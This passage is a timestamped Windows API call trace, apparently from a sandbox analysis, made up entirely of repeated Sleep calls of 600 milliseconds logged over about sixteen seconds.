[0108.016] Sleep (dwMilliseconds=0x258) [0108.079] Sleep (dwMilliseconds=0x258) [0108.104] Sleep (dwMilliseconds=0x258) [0108.110] Sleep (dwMilliseconds=0x258) [0108.126] Sleep (dwMilliseconds=0x258) [0108.142] Sleep (dwMilliseconds=0x258) [0108.157] Sleep (dwMilliseconds=0x258) [0108.172] Sleep (dwMilliseconds=0x258) [0108.223] Sleep (dwMilliseconds=0x258) [0108.275] Sleep (dwMilliseconds=0x258) [0108.351] Sleep (dwMilliseconds=0x258) [0108.406] Sleep (dwMilliseconds=0x258) [0108.500] Sleep (dwMilliseconds=0x258) [0108.537] Sleep (dwMilliseconds=0x258) [0108.595] Sleep (dwMilliseconds=0x258) [0108.609] Sleep (dwMilliseconds=0x258) [0108.672] Sleep (dwMilliseconds=0x258) [0108.687] Sleep (dwMilliseconds=0x258) [0108.703] Sleep (dwMilliseconds=0x258) [0108.733] Sleep (dwMilliseconds=0x258) [0108.734] Sleep (dwMilliseconds=0x258) [0108.750] Sleep (dwMilliseconds=0x258) [0108.765] Sleep (dwMilliseconds=0x258) [0108.827] Sleep (dwMilliseconds=0x258) [0108.843] Sleep (dwMilliseconds=0x258) [0108.869] Sleep (dwMilliseconds=0x258) [0108.874] Sleep (dwMilliseconds=0x258) [0108.891] Sleep (dwMilliseconds=0x258) [0108.906] Sleep (dwMilliseconds=0x258) [0108.921] Sleep (dwMilliseconds=0x258) [0108.983] Sleep (dwMilliseconds=0x258) [0108.999] Sleep (dwMilliseconds=0x258) [0109.015] Sleep (dwMilliseconds=0x258) [0109.030] Sleep (dwMilliseconds=0x258) [0109.046] Sleep (dwMilliseconds=0x258) [0109.062] Sleep (dwMilliseconds=0x258) [0109.077] Sleep (dwMilliseconds=0x258) [0109.139] Sleep (dwMilliseconds=0x258) [0109.155] Sleep (dwMilliseconds=0x258) [0109.171] Sleep (dwMilliseconds=0x258) [0109.186] Sleep (dwMilliseconds=0x258) [0109.203] Sleep (dwMilliseconds=0x258) [0109.217] Sleep (dwMilliseconds=0x258) [0109.233] Sleep (dwMilliseconds=0x258) [0109.295] Sleep (dwMilliseconds=0x258) [0109.311] Sleep (dwMilliseconds=0x258) [0109.327] Sleep (dwMilliseconds=0x258) [0109.342] Sleep (dwMilliseconds=0x258) [0109.358] Sleep (dwMilliseconds=0x258) [0109.374] Sleep (dwMilliseconds=0x258) [0109.389] Sleep (dwMilliseconds=0x258) [0109.452] Sleep (dwMilliseconds=0x258) [0109.475] Sleep (dwMilliseconds=0x258) [0109.483] Sleep (dwMilliseconds=0x258) [0109.498] Sleep (dwMilliseconds=0x258) [0109.515] Sleep (dwMilliseconds=0x258) [0109.529] Sleep (dwMilliseconds=0x258) [0109.545] Sleep (dwMilliseconds=0x258) [0109.561] Sleep (dwMilliseconds=0x258) [0109.624] Sleep (dwMilliseconds=0x258) [0109.639] Sleep (dwMilliseconds=0x258) [0109.654] Sleep (dwMilliseconds=0x258) [0109.670] Sleep (dwMilliseconds=0x258) [0109.685] Sleep (dwMilliseconds=0x258) [0109.701] Sleep (dwMilliseconds=0x258) [0109.725] Sleep (dwMilliseconds=0x258) [0109.779] Sleep (dwMilliseconds=0x258) [0109.795] Sleep (dwMilliseconds=0x258) [0109.810] Sleep (dwMilliseconds=0x258) [0109.827] Sleep (dwMilliseconds=0x258) [0109.841] Sleep (dwMilliseconds=0x258) [0109.857] Sleep (dwMilliseconds=0x258) [0109.873] Sleep (dwMilliseconds=0x258) [0109.936] Sleep (dwMilliseconds=0x258) [0109.964] Sleep (dwMilliseconds=0x258) [0109.966] Sleep (dwMilliseconds=0x258) [0109.982] Sleep (dwMilliseconds=0x258) [0109.998] Sleep (dwMilliseconds=0x258) [0110.013] Sleep (dwMilliseconds=0x258) [0110.029] Sleep (dwMilliseconds=0x258) [0110.091] Sleep (dwMilliseconds=0x258) [0110.107] Sleep (dwMilliseconds=0x258) [0110.122] Sleep (dwMilliseconds=0x258) [0110.139] Sleep (dwMilliseconds=0x258) [0110.163] Sleep (dwMilliseconds=0x258) [0110.169] Sleep (dwMilliseconds=0x258) [0110.196] Sleep (dwMilliseconds=0x258) [0110.247] Sleep (dwMilliseconds=0x258) [0110.263] Sleep (dwMilliseconds=0x258) [0110.279] Sleep (dwMilliseconds=0x258) [0110.294] Sleep (dwMilliseconds=0x258) [0110.310] Sleep (dwMilliseconds=0x258) [0110.332] Sleep (dwMilliseconds=0x258) [0110.341] Sleep (dwMilliseconds=0x258) [0110.403] Sleep (dwMilliseconds=0x258) [0110.435] Sleep (dwMilliseconds=0x258) [0110.450] Sleep (dwMilliseconds=0x258) [0110.466] Sleep (dwMilliseconds=0x258) [0110.482] Sleep (dwMilliseconds=0x258) [0110.497] Sleep (dwMilliseconds=0x258) [0110.523] Sleep (dwMilliseconds=0x258) [0110.575] Sleep (dwMilliseconds=0x258) [0110.600] Sleep (dwMilliseconds=0x258) [0110.851] Sleep (dwMilliseconds=0x258) [0110.856] Sleep (dwMilliseconds=0x258) [0111.066] Sleep (dwMilliseconds=0x258) [0111.079] Sleep (dwMilliseconds=0x258) [0111.090] Sleep (dwMilliseconds=0x258) [0111.155] Sleep (dwMilliseconds=0x258) [0111.180] Sleep (dwMilliseconds=0x258) [0111.183] Sleep (dwMilliseconds=0x258) [0111.199] Sleep (dwMilliseconds=0x258) [0111.214] Sleep (dwMilliseconds=0x258) [0111.230] Sleep (dwMilliseconds=0x258) [0111.246] Sleep (dwMilliseconds=0x258) [0111.261] Sleep (dwMilliseconds=0x258) [0111.323] Sleep (dwMilliseconds=0x258) [0111.339] Sleep (dwMilliseconds=0x258) [0111.355] Sleep (dwMilliseconds=0x258) [0111.370] Sleep (dwMilliseconds=0x258) [0111.388] Sleep (dwMilliseconds=0x258) [0111.402] Sleep (dwMilliseconds=0x258) [0111.418] Sleep (dwMilliseconds=0x258) [0111.479] Sleep (dwMilliseconds=0x258) [0111.497] Sleep (dwMilliseconds=0x258) [0111.511] Sleep (dwMilliseconds=0x258) [0111.526] Sleep (dwMilliseconds=0x258) [0111.542] Sleep (dwMilliseconds=0x258) [0111.557] Sleep (dwMilliseconds=0x258) [0111.573] Sleep (dwMilliseconds=0x258) [0111.635] Sleep (dwMilliseconds=0x258) [0111.654] Sleep (dwMilliseconds=0x258) [0111.667] Sleep (dwMilliseconds=0x258) [0111.682] Sleep (dwMilliseconds=0x258) [0111.698] Sleep (dwMilliseconds=0x258) [0111.714] Sleep (dwMilliseconds=0x258) [0111.729] Sleep (dwMilliseconds=0x258) [0111.745] Sleep (dwMilliseconds=0x258) [0111.807] Sleep (dwMilliseconds=0x258) [0111.823] Sleep (dwMilliseconds=0x258) [0111.838] Sleep (dwMilliseconds=0x258) [0111.854] Sleep (dwMilliseconds=0x258) [0111.870] Sleep (dwMilliseconds=0x258) [0111.885] Sleep (dwMilliseconds=0x258) [0111.901] Sleep (dwMilliseconds=0x258) [0111.963] Sleep (dwMilliseconds=0x258) [0111.983] Sleep (dwMilliseconds=0x258) [0111.994] Sleep (dwMilliseconds=0x258) [0112.010] Sleep (dwMilliseconds=0x258) [0112.026] Sleep (dwMilliseconds=0x258) [0112.041] Sleep (dwMilliseconds=0x258) [0112.058] Sleep (dwMilliseconds=0x258) [0112.083] Sleep (dwMilliseconds=0x258) [0112.144] Sleep (dwMilliseconds=0x258) [0112.166] Sleep (dwMilliseconds=0x258) [0112.182] Sleep (dwMilliseconds=0x258) [0112.197] Sleep (dwMilliseconds=0x258) [0112.213] Sleep (dwMilliseconds=0x258) [0112.228] Sleep (dwMilliseconds=0x258) [0112.244] Sleep (dwMilliseconds=0x258) [0112.306] Sleep (dwMilliseconds=0x258) [0112.327] Sleep (dwMilliseconds=0x258) [0112.338] Sleep (dwMilliseconds=0x258) [0112.353] Sleep (dwMilliseconds=0x258) [0112.369] Sleep (dwMilliseconds=0x258) [0112.384] Sleep (dwMilliseconds=0x258) [0112.401] Sleep (dwMilliseconds=0x258) [0112.416] Sleep (dwMilliseconds=0x258) [0112.478] Sleep (dwMilliseconds=0x258) [0112.495] Sleep (dwMilliseconds=0x258) [0112.510] Sleep (dwMilliseconds=0x258) [0112.526] Sleep (dwMilliseconds=0x258) [0112.542] Sleep (dwMilliseconds=0x258) [0112.556] Sleep (dwMilliseconds=0x258) [0112.571] Sleep (dwMilliseconds=0x258) [0112.587] Sleep (dwMilliseconds=0x258) [0112.651] Sleep (dwMilliseconds=0x258) [0112.670] Sleep (dwMilliseconds=0x258) [0112.681] Sleep (dwMilliseconds=0x258) [0112.696] Sleep (dwMilliseconds=0x258) [0112.712] Sleep (dwMilliseconds=0x258) [0112.728] Sleep (dwMilliseconds=0x258) [0112.743] Sleep (dwMilliseconds=0x258) [0112.760] Sleep (dwMilliseconds=0x258) [0112.821] Sleep (dwMilliseconds=0x258) [0112.841] Sleep (dwMilliseconds=0x258) [0112.852] Sleep (dwMilliseconds=0x258) [0112.869] Sleep (dwMilliseconds=0x258) [0112.883] Sleep (dwMilliseconds=0x258) [0112.899] Sleep (dwMilliseconds=0x258) [0112.915] Sleep (dwMilliseconds=0x258) [0112.930] Sleep (dwMilliseconds=0x258) [0112.993] Sleep (dwMilliseconds=0x258) [0113.023] Sleep (dwMilliseconds=0x258) [0113.024] Sleep (dwMilliseconds=0x258) [0113.040] Sleep (dwMilliseconds=0x258) [0113.055] Sleep (dwMilliseconds=0x258) [0113.071] Sleep (dwMilliseconds=0x258) [0113.097] Sleep (dwMilliseconds=0x258) [0113.103] Sleep (dwMilliseconds=0x258) [0113.166] Sleep (dwMilliseconds=0x258) [0113.199] Sleep (dwMilliseconds=0x258) [0113.211] Sleep (dwMilliseconds=0x258) [0113.227] Sleep (dwMilliseconds=0x258) [0113.242] Sleep (dwMilliseconds=0x258) [0113.258] Sleep (dwMilliseconds=0x258) [0113.277] Sleep (dwMilliseconds=0x258) [0113.289] Sleep (dwMilliseconds=0x258) [0113.351] Sleep (dwMilliseconds=0x258) [0113.376] Sleep (dwMilliseconds=0x258) [0113.383] Sleep (dwMilliseconds=0x258) [0113.398] Sleep (dwMilliseconds=0x258) [0113.415] Sleep (dwMilliseconds=0x258) [0113.429] Sleep (dwMilliseconds=0x258) [0113.445] Sleep (dwMilliseconds=0x258) [0113.461] Sleep (dwMilliseconds=0x258) [0113.524] Sleep (dwMilliseconds=0x258) [0113.548] Sleep (dwMilliseconds=0x258) [0113.554] Sleep (dwMilliseconds=0x258) [0113.570] Sleep (dwMilliseconds=0x258) [0113.585] Sleep (dwMilliseconds=0x258) [0113.601] Sleep (dwMilliseconds=0x258) [0113.617] Sleep (dwMilliseconds=0x258) [0113.633] Sleep (dwMilliseconds=0x258) [0113.695] Sleep (dwMilliseconds=0x258) [0113.718] Sleep (dwMilliseconds=0x258) [0113.726] Sleep (dwMilliseconds=0x258) [0113.742] Sleep (dwMilliseconds=0x258) [0113.757] Sleep (dwMilliseconds=0x258) [0113.773] Sleep (dwMilliseconds=0x258) [0113.788] Sleep (dwMilliseconds=0x258) [0113.804] Sleep (dwMilliseconds=0x258) [0113.866] Sleep (dwMilliseconds=0x258) [0113.884] Sleep (dwMilliseconds=0x258) [0113.897] Sleep (dwMilliseconds=0x258) [0113.914] Sleep (dwMilliseconds=0x258) [0113.929] Sleep (dwMilliseconds=0x258) [0113.945] Sleep (dwMilliseconds=0x258) [0113.962] Sleep (dwMilliseconds=0x258) [0113.976] Sleep (dwMilliseconds=0x258) [0114.038] Sleep (dwMilliseconds=0x258) [0114.059] Sleep (dwMilliseconds=0x258) [0114.070] Sleep (dwMilliseconds=0x258) [0114.085] Sleep (dwMilliseconds=0x258) [0114.110] Sleep (dwMilliseconds=0x258) [0114.116] Sleep (dwMilliseconds=0x258) [0114.131] Sleep (dwMilliseconds=0x258) [0114.158] Sleep (dwMilliseconds=0x258) [0114.201] Sleep (dwMilliseconds=0x258) [0114.233] Sleep (dwMilliseconds=0x258) [0114.241] Sleep (dwMilliseconds=0x258) [0114.257] Sleep (dwMilliseconds=0x258) [0114.272] Sleep (dwMilliseconds=0x258) [0114.288] Sleep (dwMilliseconds=0x258) [0114.306] Sleep (dwMilliseconds=0x258) [0114.319] Sleep (dwMilliseconds=0x258) [0114.381] Sleep (dwMilliseconds=0x258) [0114.397] Sleep (dwMilliseconds=0x258) [0114.414] Sleep (dwMilliseconds=0x258) [0114.428] Sleep (dwMilliseconds=0x258) [0114.444] Sleep (dwMilliseconds=0x258) [0114.459] Sleep (dwMilliseconds=0x258) [0114.475] Sleep (dwMilliseconds=0x258) [0114.538] Sleep (dwMilliseconds=0x258) [0114.553] Sleep (dwMilliseconds=0x258) [0114.568] Sleep (dwMilliseconds=0x258) [0114.584] Sleep (dwMilliseconds=0x258) [0114.600] Sleep (dwMilliseconds=0x258) [0114.615] Sleep (dwMilliseconds=0x258) [0114.631] Sleep (dwMilliseconds=0x258) [0114.693] Sleep (dwMilliseconds=0x258) [0114.709] Sleep (dwMilliseconds=0x258) [0114.725] Sleep (dwMilliseconds=0x258) [0114.740] Sleep (dwMilliseconds=0x258) [0114.757] Sleep (dwMilliseconds=0x258) [0114.771] Sleep (dwMilliseconds=0x258) [0114.787] Sleep (dwMilliseconds=0x258) [0114.802] Sleep (dwMilliseconds=0x258) [0114.865] Sleep (dwMilliseconds=0x258) [0114.880] Sleep (dwMilliseconds=0x258) [0114.896] Sleep (dwMilliseconds=0x258) [0114.912] Sleep (dwMilliseconds=0x258) [0114.927] Sleep (dwMilliseconds=0x258) [0114.943] Sleep (dwMilliseconds=0x258) [0114.958] Sleep (dwMilliseconds=0x258) [0115.021] Sleep (dwMilliseconds=0x258) [0115.037] Sleep (dwMilliseconds=0x258) [0115.052] Sleep (dwMilliseconds=0x258) [0115.068] Sleep (dwMilliseconds=0x258) [0115.084] Sleep (dwMilliseconds=0x258) [0115.112] Sleep (dwMilliseconds=0x258) [0115.114] Sleep (dwMilliseconds=0x258) [0115.130] Sleep (dwMilliseconds=0x258) [0115.193] Sleep (dwMilliseconds=0x258) [0115.222] Sleep (dwMilliseconds=0x258) [0115.223] Sleep (dwMilliseconds=0x258) [0115.239] Sleep (dwMilliseconds=0x258) [0115.255] Sleep (dwMilliseconds=0x258) [0115.270] Sleep (dwMilliseconds=0x258) [0115.286] Sleep (dwMilliseconds=0x258) [0115.302] Sleep (dwMilliseconds=0x258) [0115.364] Sleep (dwMilliseconds=0x258) [0115.379] Sleep (dwMilliseconds=0x258) [0115.395] Sleep (dwMilliseconds=0x258) [0115.412] Sleep (dwMilliseconds=0x258) [0115.427] Sleep (dwMilliseconds=0x258) [0115.442] Sleep (dwMilliseconds=0x258) [0115.458] Sleep (dwMilliseconds=0x258) [0115.521] Sleep (dwMilliseconds=0x258) [0115.536] Sleep (dwMilliseconds=0x258) [0115.551] Sleep (dwMilliseconds=0x258) [0115.567] Sleep (dwMilliseconds=0x258) [0115.582] Sleep (dwMilliseconds=0x258) [0115.598] Sleep (dwMilliseconds=0x258) [0115.614] Sleep (dwMilliseconds=0x258) [0115.676] Sleep (dwMilliseconds=0x258) [0115.698] Sleep (dwMilliseconds=0x258) [0115.707] Sleep (dwMilliseconds=0x258) [0115.723] Sleep (dwMilliseconds=0x258) [0115.739] Sleep (dwMilliseconds=0x258) [0115.754] Sleep (dwMilliseconds=0x258) [0115.769] Sleep (dwMilliseconds=0x258) [0115.786] Sleep (dwMilliseconds=0x258) [0115.848] Sleep (dwMilliseconds=0x258) [0115.864] Sleep (dwMilliseconds=0x258) [0115.904] Sleep (dwMilliseconds=0x258) [0115.954] Sleep (dwMilliseconds=0x258) [0116.035] Sleep (dwMilliseconds=0x258) [0116.091] Sleep (dwMilliseconds=0x258) [0116.128] Sleep (dwMilliseconds=0x258) [0116.190] Sleep (dwMilliseconds=0x258) [0116.239] Sleep (dwMilliseconds=0x258) [0116.294] Sleep (dwMilliseconds=0x258) [0116.331] Sleep (dwMilliseconds=0x258) [0116.378] Sleep (dwMilliseconds=0x258) [0116.441] Sleep (dwMilliseconds=0x258) [0116.462] Sleep (dwMilliseconds=0x258) [0116.472] Sleep (dwMilliseconds=0x258) [0116.488] Sleep (dwMilliseconds=0x258) [0116.550] Sleep (dwMilliseconds=0x258) [0116.643] Sleep (dwMilliseconds=0x258) [0116.680] Sleep (dwMilliseconds=0x258) [0116.690] Sleep (dwMilliseconds=0x258) [0116.706] Sleep (dwMilliseconds=0x258) [0116.723] Sleep (dwMilliseconds=0x258) [0116.737] Sleep (dwMilliseconds=0x258) [0116.753] Sleep (dwMilliseconds=0x258) [0116.815] Sleep (dwMilliseconds=0x258) [0116.862] Sleep (dwMilliseconds=0x258) [0116.891] Sleep (dwMilliseconds=0x258) [0116.893] Sleep (dwMilliseconds=0x258) [0116.908] Sleep (dwMilliseconds=0x258) [0116.925] Sleep (dwMilliseconds=0x258) [0116.951] Sleep (dwMilliseconds=0x258) [0116.955] Sleep (dwMilliseconds=0x258) [0116.971] Sleep (dwMilliseconds=0x258) [0117.033] Sleep (dwMilliseconds=0x258) [0117.081] Sleep (dwMilliseconds=0x258) [0117.106] Sleep (dwMilliseconds=0x258) [0117.112] Sleep (dwMilliseconds=0x258) [0117.127] Sleep (dwMilliseconds=0x258) [0117.166] Sleep (dwMilliseconds=0x258) [0117.177] Sleep (dwMilliseconds=0x258) [0117.195] Sleep (dwMilliseconds=0x258) [0117.298] Sleep (dwMilliseconds=0x258) [0117.319] Sleep (dwMilliseconds=0x258) [0117.331] Sleep (dwMilliseconds=0x258) [0117.345] Sleep (dwMilliseconds=0x258) [0117.361] Sleep (dwMilliseconds=0x258) [0117.382] Sleep (dwMilliseconds=0x258) [0117.405] Sleep (dwMilliseconds=0x258) [0117.454] Sleep (dwMilliseconds=0x258) [0117.501] Sleep (dwMilliseconds=0x258) [0117.517] Sleep (dwMilliseconds=0x258) [0117.532] Sleep (dwMilliseconds=0x258) [0117.548] Sleep (dwMilliseconds=0x258) [0117.564] Sleep (dwMilliseconds=0x258) [0117.580] Sleep (dwMilliseconds=0x258) [0117.597] Sleep (dwMilliseconds=0x258) [0117.657] Sleep (dwMilliseconds=0x258) [0117.705] Sleep (dwMilliseconds=0x258) [0117.722] Sleep (dwMilliseconds=0x258) [0117.735] Sleep (dwMilliseconds=0x258) [0117.751] Sleep (dwMilliseconds=0x258) [0117.772] Sleep (dwMilliseconds=0x258) [0117.782] Sleep (dwMilliseconds=0x258) [0117.798] Sleep (dwMilliseconds=0x258) [0117.860] Sleep (dwMilliseconds=0x258) [0117.907] Sleep (dwMilliseconds=0x258) [0117.930] Sleep (dwMilliseconds=0x258) [0117.939] Sleep (dwMilliseconds=0x258) [0117.954] Sleep (dwMilliseconds=0x258) [0117.971] Sleep (dwMilliseconds=0x258) [0117.985] Sleep (dwMilliseconds=0x258) [0118.004] Sleep (dwMilliseconds=0x258) [0118.019] Sleep (dwMilliseconds=0x258) [0118.078] Sleep (dwMilliseconds=0x258) [0118.127] Sleep (dwMilliseconds=0x258) [0118.170] Sleep (dwMilliseconds=0x258) [0118.172] Sleep (dwMilliseconds=0x258) [0118.188] Sleep (dwMilliseconds=0x258) [0118.203] Sleep (dwMilliseconds=0x258) [0118.220] Sleep (dwMilliseconds=0x258) [0118.235] Sleep (dwMilliseconds=0x258) [0118.250] Sleep (dwMilliseconds=0x258) [0118.328] Sleep (dwMilliseconds=0x258) [0118.378] Sleep (dwMilliseconds=0x258) [0118.405] Sleep (dwMilliseconds=0x258) [0118.406] Sleep (dwMilliseconds=0x258) [0118.422] Sleep (dwMilliseconds=0x258) [0118.438] Sleep (dwMilliseconds=0x258) [0118.453] Sleep (dwMilliseconds=0x258) [0118.469] Sleep (dwMilliseconds=0x258) [0118.485] Sleep (dwMilliseconds=0x258) [0118.546] Sleep (dwMilliseconds=0x258) [0118.579] Sleep (dwMilliseconds=0x258) [0118.608] Sleep (dwMilliseconds=0x258) [0118.609] Sleep (dwMilliseconds=0x258) [0118.624] Sleep (dwMilliseconds=0x258) [0118.640] Sleep (dwMilliseconds=0x258) [0118.656] Sleep (dwMilliseconds=0x258) [0118.671] Sleep (dwMilliseconds=0x258) [0118.733] Sleep (dwMilliseconds=0x258) [0118.780] Sleep (dwMilliseconds=0x258) [0118.825] Sleep (dwMilliseconds=0x258) [0119.046] Sleep (dwMilliseconds=0x258) [0119.108] Sleep (dwMilliseconds=0x258) [0119.155] Sleep (dwMilliseconds=0x258) [0119.177] Sleep (dwMilliseconds=0x258) [0119.187] Sleep (dwMilliseconds=0x258) [0119.202] Sleep (dwMilliseconds=0x258) [0119.217] Sleep (dwMilliseconds=0x258) [0119.233] Sleep (dwMilliseconds=0x258) [0119.250] Sleep (dwMilliseconds=0x258) [0119.326] Sleep (dwMilliseconds=0x258) [0119.375] Sleep (dwMilliseconds=0x258) [0119.403] Sleep (dwMilliseconds=0x258) [0119.410] Sleep (dwMilliseconds=0x258) [0119.420] Sleep (dwMilliseconds=0x258) [0119.436] Sleep (dwMilliseconds=0x258) [0119.451] Sleep (dwMilliseconds=0x258) [0119.467] Sleep (dwMilliseconds=0x258) [0119.484] Sleep (dwMilliseconds=0x258) [0119.545] Sleep (dwMilliseconds=0x258) [0119.592] Sleep (dwMilliseconds=0x258) [0119.643] Sleep (dwMilliseconds=0x258) [0119.654] Sleep (dwMilliseconds=0x258) [0119.670] Sleep (dwMilliseconds=0x258) [0119.686] Sleep (dwMilliseconds=0x258) [0119.702] Sleep (dwMilliseconds=0x258) [0119.718] Sleep (dwMilliseconds=0x258) [0119.779] Sleep (dwMilliseconds=0x258) [0119.826] Sleep (dwMilliseconds=0x258) [0119.849] Sleep (dwMilliseconds=0x258) [0119.857] Sleep (dwMilliseconds=0x258) [0119.873] Sleep (dwMilliseconds=0x258) [0119.888] Sleep (dwMilliseconds=0x258) [0119.904] Sleep (dwMilliseconds=0x258) [0119.920] Sleep (dwMilliseconds=0x258) [0119.936] Sleep (dwMilliseconds=0x258) [0119.998] Sleep (dwMilliseconds=0x258) [0120.046] Sleep (dwMilliseconds=0x258) [0120.065] Sleep (dwMilliseconds=0x258) [0120.075] Sleep (dwMilliseconds=0x258) [0120.093] Sleep (dwMilliseconds=0x258) [0120.107] Sleep (dwMilliseconds=0x258) [0120.122] Sleep (dwMilliseconds=0x258) [0120.138] Sleep (dwMilliseconds=0x258) [0120.200] Sleep (dwMilliseconds=0x258) [0120.247] Sleep (dwMilliseconds=0x258) [0120.267] Sleep (dwMilliseconds=0x258) [0120.282] Sleep (dwMilliseconds=0x258) [0120.317] Sleep (dwMilliseconds=0x258) [0120.325] Sleep (dwMilliseconds=0x258) [0120.341] Sleep (dwMilliseconds=0x258) [0120.403] Sleep (dwMilliseconds=0x258) [0120.451] Sleep (dwMilliseconds=0x258) [0120.509] Sleep (dwMilliseconds=0x258) [0120.512] Sleep (dwMilliseconds=0x258) [0120.527] Sleep (dwMilliseconds=0x258) [0120.543] Sleep (dwMilliseconds=0x258) [0120.559] Sleep (dwMilliseconds=0x258) [0120.575] Sleep (dwMilliseconds=0x258) [0120.637] Sleep (dwMilliseconds=0x258) [0120.685] Sleep (dwMilliseconds=0x258) [0120.717] Sleep (dwMilliseconds=0x258) [0120.731] Sleep (dwMilliseconds=0x258) [0120.747] Sleep (dwMilliseconds=0x258) [0120.762] Sleep (dwMilliseconds=0x258) [0120.778] Sleep (dwMilliseconds=0x258) [0120.793] Sleep (dwMilliseconds=0x258) [0120.855] Sleep (dwMilliseconds=0x258) [0120.902] Sleep (dwMilliseconds=0x258) [0120.921] Sleep (dwMilliseconds=0x258) [0120.933] Sleep (dwMilliseconds=0x258) [0120.949] Sleep (dwMilliseconds=0x258) [0120.965] Sleep (dwMilliseconds=0x258) [0120.980] Sleep (dwMilliseconds=0x258) [0120.996] Sleep (dwMilliseconds=0x258) [0121.058] Sleep (dwMilliseconds=0x258) [0121.105] Sleep (dwMilliseconds=0x258) [0121.146] Sleep (dwMilliseconds=0x258) [0121.151] Sleep (dwMilliseconds=0x258) [0121.167] Sleep (dwMilliseconds=0x258) [0121.183] Sleep (dwMilliseconds=0x258) [0121.198] Sleep (dwMilliseconds=0x258) [0121.215] Sleep (dwMilliseconds=0x258) [0121.276] Sleep (dwMilliseconds=0x258) [0121.356] Sleep (dwMilliseconds=0x258) [0121.405] Sleep (dwMilliseconds=0x258) [0121.417] Sleep (dwMilliseconds=0x258) [0121.433] Sleep (dwMilliseconds=0x258) [0121.448] Sleep (dwMilliseconds=0x258) [0121.466] Sleep (dwMilliseconds=0x258) [0121.526] Sleep (dwMilliseconds=0x258) [0121.575] Sleep (dwMilliseconds=0x258) [0121.603] Sleep (dwMilliseconds=0x258) [0121.604] Sleep (dwMilliseconds=0x258) [0121.620] Sleep (dwMilliseconds=0x258) [0121.635] Sleep (dwMilliseconds=0x258) [0121.651] Sleep (dwMilliseconds=0x258) [0121.666] Sleep (dwMilliseconds=0x258) [0121.684] Sleep (dwMilliseconds=0x258) [0121.746] Sleep (dwMilliseconds=0x258) [0121.792] Sleep (dwMilliseconds=0x258) [0121.821] Sleep (dwMilliseconds=0x258) [0121.822] Sleep (dwMilliseconds=0x258) [0121.838] Sleep (dwMilliseconds=0x258) [0121.854] Sleep (dwMilliseconds=0x258) [0121.870] Sleep (dwMilliseconds=0x258) [0121.885] Sleep (dwMilliseconds=0x258) [0121.903] Sleep (dwMilliseconds=0x258) [0121.963] Sleep (dwMilliseconds=0x258) [0122.011] Sleep (dwMilliseconds=0x258) [0122.051] Sleep (dwMilliseconds=0x258) [0122.056] Sleep (dwMilliseconds=0x258) [0122.072] Sleep (dwMilliseconds=0x258) [0122.088] Sleep (dwMilliseconds=0x258) [0122.104] Sleep (dwMilliseconds=0x258) [0122.120] Sleep (dwMilliseconds=0x258) [0122.181] Sleep (dwMilliseconds=0x258) [0122.229] Sleep (dwMilliseconds=0x258) [0122.250] Sleep (dwMilliseconds=0x258) [0122.261] Sleep (dwMilliseconds=0x258) [0122.290] Sleep (dwMilliseconds=0x258) [0122.309] Sleep (dwMilliseconds=0x258) [0122.323] Sleep (dwMilliseconds=0x258) [0122.389] Sleep (dwMilliseconds=0x258) [0122.432] Sleep (dwMilliseconds=0x258) [0122.468] Sleep (dwMilliseconds=0x258) [0122.478] Sleep (dwMilliseconds=0x258) [0122.493] Sleep (dwMilliseconds=0x258) [0122.509] Sleep (dwMilliseconds=0x258) [0122.525] Sleep (dwMilliseconds=0x258) [0122.541] Sleep (dwMilliseconds=0x258) [0122.602] Sleep (dwMilliseconds=0x258) [0122.649] Sleep (dwMilliseconds=0x258) [0122.677] Sleep (dwMilliseconds=0x258) [0122.680] Sleep (dwMilliseconds=0x258) [0122.696] Sleep (dwMilliseconds=0x258) [0122.733] Sleep (dwMilliseconds=0x258) [0122.743] Sleep (dwMilliseconds=0x258) [0122.806] Sleep (dwMilliseconds=0x258) [0122.852] Sleep (dwMilliseconds=0x258) [0122.878] Sleep (dwMilliseconds=0x258) [0122.883] Sleep (dwMilliseconds=0x258) [0122.899] Sleep (dwMilliseconds=0x258) [0122.916] Sleep (dwMilliseconds=0x258) [0122.930] Sleep (dwMilliseconds=0x258) [0122.946] Sleep (dwMilliseconds=0x258) [0123.008] Sleep (dwMilliseconds=0x258) [0123.056] Sleep (dwMilliseconds=0x258) [0123.091] Sleep (dwMilliseconds=0x258) [0123.104] Sleep (dwMilliseconds=0x258) [0123.118] Sleep (dwMilliseconds=0x258) [0123.133] Sleep (dwMilliseconds=0x258) [0123.149] Sleep (dwMilliseconds=0x258) [0123.166] Sleep (dwMilliseconds=0x258) [0123.227] Sleep (dwMilliseconds=0x258) [0123.275] Sleep (dwMilliseconds=0x258) [0123.297] Sleep (dwMilliseconds=0x258) [0123.330] Sleep (dwMilliseconds=0x258) [0123.336] Sleep (dwMilliseconds=0x258) [0123.353] Sleep (dwMilliseconds=0x258) [0123.369] Sleep (dwMilliseconds=0x258) [0123.430] Sleep (dwMilliseconds=0x258) [0123.508] Sleep (dwMilliseconds=0x258) [0123.546] Sleep (dwMilliseconds=0x258) [0123.559] Sleep (dwMilliseconds=0x258) [0123.570] Sleep (dwMilliseconds=0x258) [0123.588] Sleep (dwMilliseconds=0x258) [0123.603] Sleep (dwMilliseconds=0x258) [0123.617] Sleep (dwMilliseconds=0x258) [0123.679] Sleep (dwMilliseconds=0x258) [0123.727] Sleep (dwMilliseconds=0x258) [0123.745] Sleep (dwMilliseconds=0x258) [0123.757] Sleep (dwMilliseconds=0x258) [0123.773] Sleep (dwMilliseconds=0x258) [0123.799] Sleep (dwMilliseconds=0x258) [0123.804] Sleep (dwMilliseconds=0x258) [0123.820] Sleep (dwMilliseconds=0x258) [0123.868] Sleep (dwMilliseconds=0x258) [0123.915] Sleep (dwMilliseconds=0x258) [0123.948] Sleep (dwMilliseconds=0x258) [0124.023] Sleep (dwMilliseconds=0x258) [0124.038] Sleep (dwMilliseconds=0x258) [0124.054] Sleep (dwMilliseconds=0x258) [0124.069] Sleep (dwMilliseconds=0x258) [0124.136] Sleep (dwMilliseconds=0x258) [0124.178] Sleep (dwMilliseconds=0x258) [0124.230] Sleep (dwMilliseconds=0x258) [0124.241] Sleep (dwMilliseconds=0x258) [0124.256] Sleep (dwMilliseconds=0x258) [0124.272] Sleep (dwMilliseconds=0x258) [0124.288] Sleep (dwMilliseconds=0x258) [0124.381] Sleep (dwMilliseconds=0x258) [0124.428] Sleep (dwMilliseconds=0x258) [0124.449] Sleep (dwMilliseconds=0x258) [0124.461] Sleep (dwMilliseconds=0x258) [0124.475] Sleep (dwMilliseconds=0x258) [0124.491] Sleep (dwMilliseconds=0x258) [0124.507] Sleep (dwMilliseconds=0x258) [0124.524] Sleep (dwMilliseconds=0x258) [0124.584] Sleep (dwMilliseconds=0x258) [0124.631] Sleep 